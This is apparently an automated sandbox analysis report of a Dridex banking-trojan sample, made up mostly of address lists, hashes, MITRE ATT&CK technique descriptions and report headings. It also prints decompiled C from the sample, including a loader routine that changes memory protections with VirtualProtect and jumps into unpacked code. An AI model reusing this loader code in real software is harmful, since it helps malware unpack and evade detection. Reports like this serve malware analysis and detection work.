0x00000000
0x6e7d1bce
0x6e7d19ea
0x6e7d19f5
0x6e7d19fc
0x6e7d19ff
0x6e7d1a01
0x6e7d1a04
0x6e7d1a07
0x6e7d1a0d
0x6e7d1a1b
0x6e7d1a2b
0x6e7d1a50
0x6e7d1a61
0x6e7d1a64
0x6e7d1a66
0x6e7d1aca
0x6e7d1acd
0x6e7d1acd
0x6e7d1acf
0x6e7d1ad2
0x6e7d1ad6
0x6e7d1ad6
0x6e7d1ada
0x00000000
0x00000000
0x6e7d1ae7
0x6e7d1aed
0x6e7d1b21
0x6e7d1b27
0x6e7d1b29
0x6e7d1bf8
0x6e7d1c00
0x6e7d1c03
0x6e7d1c05
0x6e7d1c1c
0x6e7d1c1c
0x6e7d1c07
0x6e7d1c0b
0x6e7d1c10
0x6e7d1c10
0x6e7d1c1e
0x6e7d1c24
0x6e7d1b43
0x6e7d1b43
0x6e7d1b45
0x6e7d1b45
0x6e7d1b47
0x6e7d1b47
0x6e7d1b4c
0x00000000
0x00000000
0x6e7d1b4e
0x6e7d1b4f
0x6e7d1b52
0x6e7d1b55
0x00000000
0x00000000
0x6e7d1b61
0x6e7d1b64
0x6e7d1b66
0x6e7d1b7d
0x6e7d1b7d
0x6e7d1b68
0x6e7d1b6c
0x6e7d1b71
0x6e7d1b71
0x6e7d1b8a
0x6e7d1b8d
0x6e7d1b96
0x6e7d1b99
0x6e7d1bbc
0x6e7d1bc0
0x00000000
0x6e7d1bc0
0x6e7d1ba1
0x6e7d1ba1
0x6e7d1bad
0x6e7d1bb0
0x6e7d1bb9
0x00000000
0x6e7d1bb9
0x6e7d1b2f
0x6e7d1b3f
0x6e7d1b3f
0x6e7d1b41
0x00000000
0x00000000
0x6e7d1b37
0x6e7d1b39
0x6e7d1b39
0x00000000
0x6e7d1b3f
0x6e7d1aef
0x6e7d1af7
0x6e7d1b17
0x6e7d1af9
0x6e7d1af9
0x6e7d1b01
0x6e7d1b0a
0x6e7d1b0a
0x6e7d1b01
0x00000000
0x6e7d1af7
0x6e7d1a68
0x6e7d1a6f
0x00000000
0x00000000
0x6e7d1a7c
0x6e7d1a82
0x6e7d1a87
0x6e7d1a8e
0x6e7d1a92
0x6e7d1aa7
0x6e7d1aa9
0x6e7d1aab
0x6e7d1ab1
0x6e7d1abf
0x6e7d1abf
0x6e7d1ac5
0x00000000
0x6e7d1ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d1a0f
0x6e7d1a0f
0x6e7d1a0f
0x6e7d1a10
0x6e7d1a13
0x6e7d1a17
0x00000000
0x6e7d1a2d
0x6e7d1a30
0x6e7d1a33
0x6e7d1a3c
0x6e7d1a3f
0x6e7d1a40
0x6e7d1a42
0x00000000
0x6e7d147d
0x6e7d147f
0x6e7d1484
0x6e7d148f
0x6e7d149d
0x6e7d14b0
0x6e7d14bd
0x6e7d14c6
0x6e7d14ca
0x6e7d14ce
0x6e7d1516
0x6e7d1516
0x6e7d1518
0x6e7d151f
0x00000000
0x00000000
0x6e7d1538
0x6e7d1540
0x6e7d1544
0x6e7d1559
0x6e7d155d
0x6e7d1561
0x6e7d156a
0x6e7d1570
0x6e7d1573
0x6e7d1577
0x6e7d157f
0x6e7d1581
0x6e7d1585
0x6e7d158c
0x6e7d1595
0x6e7d1595
0x6e7d1599
0x6e7d15ae
0x6e7d15c4
0x6e7d15d1
0x6e7d15d2
0x6e7d15d2
0x6e7d15d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d158e
0x6e7d158e
0x6e7d158e
0x6e7d158f
0x6e7d1590
0x00000000
0x6e7d158e
0x6e7d1553
0x6e7d1557
0x00000000
0x00000000
0x00000000
0x6e7d15d8
0x6e7d15d8
0x6e7d15d9
0x6e7d15dc
0x6e7d15e6
0x6e7d15e6
0x6e7d15ea
0x6e7d15f1
0x6e7d164c
0x6e7d1651
0x6e7d16a4
0x6e7d16a4
0x6e7d16a8
0x6e7d16ac
0x6e7d14d6
0x6e7d14d9
0x6e7d14de
0x6e7d14e4
0x6e7d14e7
0x6e7d14ee
0x6e7d14f2
0x6e7d14f9
0x6e7d1502
0x6e7d1506
0x6e7d150a
0x6e7d1510
0x00000000
0x00000000
0x00000000
0x6e7d1510
0x6e7d16b6
0x6e7d16c2
0x6e7d16cd
0x6e7d16d4
0x6e7d16dd
0x6e7d16e7
0x6e7d16e8
0x6e7d16f6
0x6e7d16fb
0x6e7d16fc
0x6e7d1709
0x6e7d170e
0x6e7d1720
0x6e7d1725
0x6e7d172a
0x6e7d173c
0x6e7d174e
0x6e7d1753
0x6e7d175e
0x6e7d1765
0x6e7d176a
0x6e7d1772
0x6e7d177b
0x6e7d177b
0x6e7d1787
0x6e7d178e
0x6e7d179a
0x6e7d17a6
0x6e7d17b4
0x6e7d17c5
0x6e7d17cc
0x6e7d17d1
0x6e7d17da
0x6e7d17df
0x6e7d17e1
0x6e7d17e5
0x6e7d17e9
0x6e7d17f6
0x6e7d1803
0x6e7d1807
0x6e7d181b
0x6e7d181f
0x00000000
0x00000000
0x6e7d1834
0x6e7d1836
0x6e7d183e
0x6e7d183b
0x6e7d183b
0x6e7d183b
0x6e7d1842
0x6e7d1844
0x6e7d184a
0x6e7d1850
0x6e7d18ac
0x6e7d18b5
0x6e7d18b9
0x6e7d18c6
0x6e7d18cf
0x6e7d18d4
0x6e7d18d8
0x6e7d18db
0x6e7d193c
0x6e7d1952
0x6e7d195d
0x6e7d195e
0x6e7d195f
0x6e7d1963
0x6e7d1966
0x6e7d1be6
0x6e7d1be9
0x6e7d1be9
0x00000000
0x6e7d1966
0x6e7d18e5
0x6e7d18f5
0x6e7d18fe
0x6e7d1907
0x6e7d1910
0x6e7d1911
0x6e7d1912
0x6e7d1917
0x6e7d191f
0x6e7d1927
0x00000000
0x00000000
0x00000000
0x6e7d1929
0x6e7d1859
0x6e7d185e
0x6e7d1862
0x6e7d1862
0x6e7d1866
0x6e7d1869
0x00000000
0x00000000
0x6e7d188a
0x6e7d188c
0x6e7d1890
0x6e7d1892
0x00000000
0x00000000
0x6e7d1894
0x6e7d189b
0x6e7d18a7
0x00000000
0x6e7d18a7
0x6e7d186e
0x00000000
0x6e7d196c
0x6e7d196c
0x6e7d196d
0x6e7d197d
0x6e7d1989
0x6e7d1992
0x6e7d199b
0x6e7d19a4
0x00000000
0x6e7d19a4
0x6e7d1653
0x6e7d1655
0x6e7d1657
0x6e7d165c
0x6e7d1661
0x6e7d1674
0x6e7d168a
0x6e7d1693
0x6e7d1694
0x6e7d1694
0x6e7d1696
0x6e7d1697
0x6e7d169a
0x6e7d169e
0x00000000
0x6e7d1657
0x6e7d15f3
0x6e7d15fd
0x6e7d15fe
0x6e7d15fe
0x6e7d160b
0x6e7d1617
0x6e7d1619
0x6e7d161b
0x6e7d161f
0x6e7d162f
0x6e7d162f
0x6e7d1636
0x6e7d1639
0x6e7d163a
0x6e7d163e
0x6e7d1648
0x00000000
0x6e7d1648

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ec85869883a4005a69312c4472475691081d95e34a806e829f5dc280285f396
Instruction ID: 03c09f02e42c3e0394e12f63187e9fd2e93109b80a7e02a48f76394b4a231162
Opcode Fuzzy Hash: 7ec85869883a4005a69312c4472475691081d95e34a806e829f5dc280285f396
Instruction Fuzzy Hash: 853269701083458FD714DFA8CA94AEAB7E8BF94704F108D2DE595872B1EB70E949CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7C6D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E7C6D0C() {

				 *0x6e7dd280 = GetUserNameW;
				 *0x6E7DD284 = MessageBoxW;
				 *0x6E7DD288 = GetLastError;
				 *0x6E7DD28C = CreateFileA;
				 *0x6E7DD290 = DebugBreak;
				 *0x6E7DD294 = FlushFileBuffers;
				 *0x6E7DD298 = FreeEnvironmentStringsA;
				 *0x6E7DD29C = GetConsoleOutputCP;
				 *0x6E7DD2A0 = GetEnvironmentStrings;
				 *0x6E7DD2A4 = GetLocaleInfoA;
				 *0x6E7DD2A8 = GetStartupInfoA;
				 *0x6E7DD2AC = GetStringTypeA;
				 *0x6E7DD2B0 = HeapValidate;
				 *0x6E7DD2B4 = IsBadReadPtr;
				 *0x6E7DD2B8 = LCMapStringA;
				 *0x6E7DD2BC = LoadLibraryA;
				 *0x6E7DD2C0 = OutputDebugStringA;
				return 0x6e7dd280;
			}

0x6e7c6d1d
0x6e7c6d25
0x6e7c6d28
0x6e7c6d37
0x6e7c6d3a
0x6e7c6d49
0x6e7c6d4c
0x6e7c6d5b
0x6e7c6d5e
0x6e7c6d6d
0x6e7c6d70
0x6e7c6d7f
0x6e7c6d82
0x6e7c6d91
0x6e7c6d94
0x6e7c6da3
0x6e7c6da6
0x6e7c6da9

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a782ba9c83467727a2a7374ff88a439ab0f241c97f37b2209126f93fe82d2360
Instruction ID: 96f9cf75399c5408fe04ddd0968792fc13670ef8c0dc62a458c296ed3bea1c00
Opcode Fuzzy Hash: a782ba9c83467727a2a7374ff88a439ab0f241c97f37b2209126f93fe82d2360
Instruction Fuzzy Hash: C311F3B8A15A08CFCB48CF09E1909517BF9FB8E310312C2BAD8098B365E734E845CF54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6452 Parent PID: 5352 rundll32.exeCOMMON

Executed Functions

Function 00CA2092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00CA2092(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				int _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t140;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t183;
				intOrPtr _t226;
				void* _t233;
				intOrPtr _t236;
				void* _t243;
				intOrPtr* _t247;
				unsigned int _t250;
				intOrPtr _t259;
				DWORD* _t271;
				void* _t275;
				intOrPtr* _t278;
				intOrPtr* _t279;

				_t140 = _a4;
				_v20 = 0;
				_t243 =  *((intOrPtr*)(_t140 + 0x44));
				 *0xca4418 = 1;
				asm("movaps xmm0, [0xca3010]");
				asm("movups [0xca4428], xmm0");
				_v48 = _t140;
				_v52 =  *((intOrPtr*)(_t140 + 0x48));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v188 = _t243;
				_v184 =  *((intOrPtr*)(_v48 + 0x58));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_t140 + 0x54));
				_v64 = 4;
				_v68 = _t243;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t271); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x58));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E00CA1770();
				E00CA17BD(_v68,  *((intOrPtr*)(_v48 + 0x28)), _v56);
				E00CA1770( *((intOrPtr*)(_v48 + 0x28)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t278 = _t275 - 0x8c;
				_t233 = _v68;
				_t259 =  *((intOrPtr*)(_t233 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t233;
				_v108 = _t259;
				if(_t259 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v120 = _v104;
				if(_v60 != 0) {
					_v124 = 0;
					_v128 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v128;
						_t250 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t250 >> 0x1f;
						_v148 =  *((intOrPtr*)(_v140 + 8));
						_v188 = _v68 +  *((intOrPtr*)(_v140 + 0xc));
						_v184 = _v148;
						_v180 =  *((intOrPtr*)(0xca4418 + ((_t250 >> 0x0000001e & 0x00000001) << 4) + (_v144 << 3) + ((_t250 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v124;
						_t183 = VirtualProtect(??, ??, ??, ??); // executed
						_t278 = _t278 - 0x10;
						_t226 = _v152 + 1;
						_v156 = _t183;
						_v124 = _t226;
						_v128 = _v140 + 0x28;
						if(_t226 == _v60) {
							goto L8;
						}
					}
				}
				L8:
				 *_t278 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x24));
				_t159 = DisableThreadLibraryCalls(??);
				_t279 = _t278 - 4;
				_t236 =  *_v100;
				_v136 = _t159;
				_v112 = _t236;
				_v116 = _v68;
				if(_t236 != 0) {
					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t247 = _v48;
				_v44 =  *((intOrPtr*)(_t247 + 0x50));
				_v40 =  *_t247;
				_v36 =  *((intOrPtr*)(_t247 + 0x18));
				_v32 =  *((intOrPtr*)(_t247 + 0x4c));
				_v28 =  *((intOrPtr*)(_t247 + 0x10));
				_v24 = _v132;
				 *_t279 = _t247;
				_v188 = 0;
				_v184 = 0x60;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x60;
				_v172 =  *((intOrPtr*)(_v116 + 0x28));
				E00CA1770();
				if(_v172 != 0) {
					_t279 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x00ca209e
0x00ca20ac
0x00ca20b3
0x00ca20b6
0x00ca20c0
0x00ca20c7
0x00ca20d1
0x00ca20d7
0x00ca20e0
0x00ca20e9
0x00ca20ec
0x00ca20f0
0x00ca20f8
0x00ca20ff
0x00ca2102
0x00ca2105
0x00ca2108
0x00ca210b
0x00ca2125
0x00ca212b
0x00ca212e
0x00ca2136
0x00ca213a
0x00ca213d
0x00ca2140
0x00ca2143
0x00ca2146
0x00ca2162
0x00ca217f
0x00ca21a4
0x00ca21a6
0x00ca21af
0x00ca21b2
0x00ca21bc
0x00ca21bf
0x00ca21c2
0x00ca21c5
0x00ca21c8
0x00ca2216
0x00ca2216
0x00ca2249
0x00ca224c
0x00ca225c
0x00ca225f
0x00ca22a8
0x00ca22a8
0x00ca22b7
0x00ca22bf
0x00ca22cd
0x00ca22dc
0x00ca230d
0x00ca2316
0x00ca231a
0x00ca231e
0x00ca2325
0x00ca232b
0x00ca232d
0x00ca2336
0x00ca2347
0x00ca234d
0x00ca2350
0x00ca2353
0x00000000
0x00000000
0x00ca2359
0x00ca22a8
0x00ca2264
0x00ca2272
0x00ca227a
0x00ca227d
0x00ca227f
0x00ca2285
0x00ca2291
0x00ca2297
0x00ca229a
0x00ca229d
0x00ca21f9
0x00ca21f9
0x00ca236e
0x00ca2374
0x00ca2379
0x00ca237f
0x00ca2385
0x00ca238b
0x00ca2391
0x00ca2394
0x00ca2397
0x00ca239f
0x00ca23a7
0x00ca23ad
0x00ca23b3
0x00ca23b9
0x00ca23bf
0x00ca23cd
0x00ca21da
0x00ca21e0
0x00ca21e0
0x00ca2234

APIs

VirtualProtect.KERNELBASE ref: 00CA210B
VirtualProtect.KERNELBASE ref: 00CA21A4
VirtualProtect.KERNELBASE ref: 00CA232B

Strings

`, xrefs: 00CA239F

Memory Dump Source

Source File: 00000003.00000002.710622273.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: c950633029bd0914713f24b3cff93a622f973bff78b7b5151cab59911fe26f9e
Instruction ID: 007f25eb3a30a10a9c7fba21f263121a70a1f95f03f93adff58db32386905edc
Opcode Fuzzy Hash: c950633029bd0914713f24b3cff93a622f973bff78b7b5151cab59911fe26f9e
Instruction Fuzzy Hash: ABB1BEB5E042298FCB14CF99C880A9DFBF1BF89314F15816AE958AB351D730A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1000, Relevance: 1.4, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00CA10FF

Memory Dump Source

Source File: 00000003.00000002.710622273.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction ID: 2cec7d0aabcad7b4260caab68ee07043c015207749d1cb21144c4cdd78879cfa
Opcode Fuzzy Hash: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction Fuzzy Hash: 8B41D7B5E0521A8FDB04DFA9C4946AEBBF1FF48314F19856DE948AB340D375A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.4295.1397

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6E7D0730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6E7D2234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6E7D2820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6E7D3138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00A52092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Function 6E7D5E84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Function 6E7D10A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6E7D57B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6E7D5B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 00A526AA, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Function 6E7D1166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6E7D5BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E7D5BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E7D5BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6E7D5BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6E7D5C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6E7D5E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6E7D564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6E7D1030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6E7D3628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6E7C1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6E7CA4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6E7C8428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6E7D9370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6E7D143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6E7C6D0C, Relevance: .0, Instructions: 36
COMMON

Function 00CA2092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON